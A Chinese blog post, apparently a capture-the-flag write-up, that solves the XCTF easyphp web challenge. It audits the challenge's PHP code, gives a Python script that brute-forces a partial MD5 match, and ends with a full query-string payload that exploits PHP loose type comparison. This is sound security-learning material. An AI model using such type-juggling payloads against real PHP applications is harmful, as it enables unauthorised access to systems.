[XCTF]江苏工匠杯easyphp

最新推荐文章于 2024-04-30 13:26:55 发布
最新推荐文章于 2024-04-30 13:26:55 发布
阅读量278 收藏 4
点赞数 13
文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79393404/article/details/137915743
版权

拿到题目后首先大致分析一下,找flag,在最后发现一个if语句当同时满足key1=1和key2=1时才给flag,看起来比较复杂,先进行代码审计吧

<?php
highlight_file(__FILE__);
$key1 = 0;
$key2 = 0;

$a = $_GET['a'];
$b = $_GET['b'];

if(isset($a) && intval($a) > 6000000 && strlen($a) <= 3){
    if(isset($b) && '8b184b' === substr(md5($b),-6,6)){
        $key1 = 1;
        }else{
            die("Emmm...再想想");
        }
    }else{
    die("Emmm...");
}

$c=(array)json_decode(@$_GET['c']);
if(is_array($c) && !is_numeric(@$c["m"]) && $c["m"] > 2022){
    if(is_array(@$c["n"]) && count($c["n"]) == 2 && is_array($c["n"][0])){
        $d = array_search("DGGJ", $c["n"]);
        $d === false?die("no..."):NULL;
        foreach($c["n"] as $key=>$val){
            $val==="DGGJ"?die("no......"):NULL;
        }
        $key2 = 1;
    }else{
        die("no hack");
    }
}else{
    die("no");
}

if($key1 && $key2){
    include "Hgfks.php";
    echo "You're right"."\n";
    echo $flag;
}

代码审计

1.首先来看第一个if语句

if(isset($a) && intval($a) > 6000000 && strlen($a) <= 3){
    if(isset($b) && '8b184b' === substr(md5($b),-6,6)){
        $key1 = 1;
        }else{
            die("Emmm...再想想");
        }
    }else{
    die("Emmm...");
}

get传入a,b两个参数,第一行if先判断a是否大于6000000并且长度不能大于3,所以这里我们可以用科学计数法来表示a,即a=9e9。第二行if进行了一个哈希碰撞,截取md5加密后的b的后六位和8b184b比较,如果相等则满足条件,这里引用了一个脚本

import random
import hashlib
 
res = "8b184b"
while 1:
    temp = random.randint(10**11, 10**12 - 1)
    temp = str(temp)
    MD5 = hashlib.md5()
    MD5.update(temp.encode(encoding='utf-8'))
    flag = MD5.hexdigest()
    if flag[-6:]==res :
        print("碰撞成功:"+flag)
        print("明文为:"+temp)
        break
    else:
        print("碰撞中.....")

2.来看第二部分代码

$c=(array)json_decode(@$_GET['c']);
if(is_array($c) && !is_numeric(@$c["m"]) && $c["m"] > 2022){
    if(is_array(@$c["n"]) && count($c["n"]) == 2 && is_array($c["n"][0])){
        $d = array_search("DGGJ", $c["n"]);
        $d === false?die("no..."):NULL;
        foreach($c["n"] as $key=>$val){
            $val==="DGGJ"?die("no......"):NULL;
        }
        $key2 = 1;
    }else{
        die("no hack");
    }
}else{
    die("no");
}

传入一个json格式的数组参数c,并且数组中m的值要大于2022(is_numeric() 函数用于检测变量是否为数字或数字字符串。是数字返回true,否则返回false),当字符串与数字进行比较时会把字符串强制转化为整型即"123abc"会转成123,"abc"会转成0,类似于弱比较所以这里的m等于2023abc即可。接着第三行key为n的value必须为一个数组并且要有两个,并且第一个要是数组,所以n大致为{"m":"9999abc","n":[["xxx"],xxx]}。接着执行array_search() 函数(array_search() 函数在数组中搜索某个键值,并返回对应的键名)搜索n中是否有DGGJ,有的话才能使$key2=1,第二次使用foreach循环搜索n中的值是否含有"DGGJ",没有的话才能使$key2=1,我们传入一个数字时,字符串会强制转换成数字,DGGJ会转换成0,所以我们只要传入0就行了,所以c为{"m":"9999abc","n":[["666"],0]},完整的payload为:?a=9e9&b=261815215889&c={"m":"9999abc","n":[["666"],0]}

总结

这道题主要就是弱类型绕过,即字符串在和数字比较时会强制转换成数字,利用这一点可以进行绕过。另外一个就是哈希碰撞的脚本,在平时做题的时候可以多多积累这些脚本,扩大自己的知识库,如果有时间的话应该了解脚本代码是如何实现的。

我摊开心中愁
关注
  • 13
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
XCTF mfc逆向-200
12-22
查壳 vmp。。。 看了大佬博客后得知解法 这是一个MFC程序,但我不会。。。...但是我知道mfc的程序应该都是一个个控件组成 ...发现这两个东西,第一个是窗口类名,第二个我也不晓得是啥,但是它比前面和后面的少了一个消息...
圣徒xctf网站
02-14
圣徒xctf网站概述SaintsXCTF Web应用程序的前端。 这是SaintsXCTF Web应用程序的第二个版本。 前端使用React.js编写,并使用Sass进行样式设置。 API调用通过Nginx代理路由到 。指令在本地启动应用程序首次设置应该...
[xctf] 江苏工匠easyphp
YangYubo091699的博客
10-16 668
[xctf] 江苏工匠easyphp
江苏工匠_easyphp_wp
shelter1234567的博客
10-30 517
关键词江苏工匠 easyphp 攻防世界 ctf wp php弱类型
[xctf] 江苏工匠easyphp【web系列】
shutTD的博客
10-07 1941
这里绕来绕去大部分还是弱相等问题,出现的知识点的要求就是自己编写哈希碰撞脚本的能力,intval的绕过,array_search的绕过还是值得记下来的。
攻防世界题目练习——Web难度1(二)
qq_48550824的博客
09-01 334
length:正数 - 从 start 参数所在的位置返回的长度,负数 - 从字符串末端返回的长度,如果 start 参数是负数且 length 小于或等于 start,则 length 为 0。因为本题中字符串"DGGJ"是没有数字的字符串,因此,当我们的$c[“n”]=0的时候(或者null),会将前面要查找的字符串自动转化为0然后进行比较。“admin”==0 //admin被转换成数字,由于admin是字符串,转换失败,int(admin)=0,所以比较结果是true。
XMan-MISC-诸葛建伟XCTF-public.pdf
12-04
MISC,中文即杂项,包括隐写,数据还原,脑洞、社会工程、与信息安全相关的大数据等。 竞赛过程中解MISC时会涉及到各种脑洞,各种花式技巧,主要考察选手的快速理解、学习能力以及日常知识积累的广度、深度。...
XCTF-HW-pipeline附件
11-09
附件
supervisor 简单理解
qq_42857358的博客
04-28 196
test.ini文件内容。
2024 XYCTF Web 方向 wp 全解
qq_39947980的博客
04-27 966
XYCTF 2024 Web 方向全解
PHP】sign加签方法示例
q8688的博客
04-25 406
【代码】【PHP】sign加签方法示例。
桌面运维岗面试三十问
一坨小橙子的博客
04-28 682
桌面运维岗面试问题及答案汇总
PHP算命源码_最新测算塔罗源码_可以运营
吉他程序员的博客
04-30 91
八字精批、事业财运、姓名分析、宝宝起名、公司测名、姓名配对、综合详批、姻缘测算、牛年感情、PC版测算、八字合婚、紫微斗数、鼠年运程、月老姻缘、许愿祈福、号码解析、塔罗运势、脱单占卜、感情继续、脱单占卜、塔罗爱情、心理有你、能否复合、暗恋对象、是否分手、爱着别人、大师服务(包含多项功能)共计30余项功能,全网功能全,完善的版本。
牛客NC368 质数的计数【中等 基础数学,数论 C++/Java/Go/PHP
weixin_37991016的博客
04-27 258
【代码】牛客NC368 质数的计数【中等 基础数学,数论 C++/Java/Go/PHP
网络之路29:三层链路聚合
衡水铁头哥的博客
04-28 637
正文共:1666 字 17 图,预估阅读时间:3 分钟目录网络之路第一章:Windows系统中的网络0、序言 1、Windows系统中的网络 1.1、桌面中的网卡 1.2、命令行中的网卡 1.3、路由表 1.4、家用路由器网络之路第二章:认识企业设备2、认识企业设备 2.1、MSR810-W外观 2.2、登录MSR810-W管理页面 2.3、快速设置上网 2.4、WLAN配置 2...
FRPC+PHP+MYSQL+APACHE2=个人网站
这里没有简介
04-24 565
然后,任意访问 www.domain.com或者222.domain.com,会发现得到的页面都是一样的。可以看到,有很多目录,我想实现 typecho.domain.com,这样的三级域名的方式,访问,应用背景有公网需求,但是又不想去买又贵又低配置的服务器,然后方案就应运而生。PHP+MYSQL+APACHE2,作为网站搭建,具体细节不细讲,custom_domains 其中的值,带上了*,通配符匹配。token = 第三方token。这个时候,需要配置apache。在FRPC.ini的配置里面。
windows11安装nginx
最新发布
xiaobai_cpp的博客
04-30 92
5.网络->侦听端口,查看nginx侦听的端口,这里是90端口。1.解压nginx安装包到没有中文的目录。3.任务管理器查看是否有nginx进程。4.任务管理器->性能->资源监视器。2.双击运行nginx.exe。
远程桌面的端口配置与优化
day3ZY的博客
04-29 394
然而,随着网络攻击的增加,确保远程桌面连接的安全性变得尤为重要。通过更改远程桌面的默认端口并采取其他安全措施,管理员可以大大提高远程桌面连接的安全性,从而保护企业的数据和资源。4. 在“本地设备和资源”窗口中,点击“远程端口”旁边的“下拉箭头”,然后选择一个不同的端口号。确保只有必要的计算机和用户可以访问新的远程桌面端口。1. 打开“开始”菜单,搜索“远程桌面连接”,并打开它。保持远程桌面服务和操作系统的更新,以获取最新的安全补丁。2. 在“远程桌面连接”窗口中,点击“显示选项”。
xctf supersqli
09-01
对于 xctf supersqli,它是一个供参与者练习 SQL 注入技巧的 CTF(Capture The Flag)比赛题目。CTF比赛是一种网络安全竞赛,旨在测试参与者在各种安全领域的技能。在 xctf supersqli 中,参与者需要利用 SQL 注入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值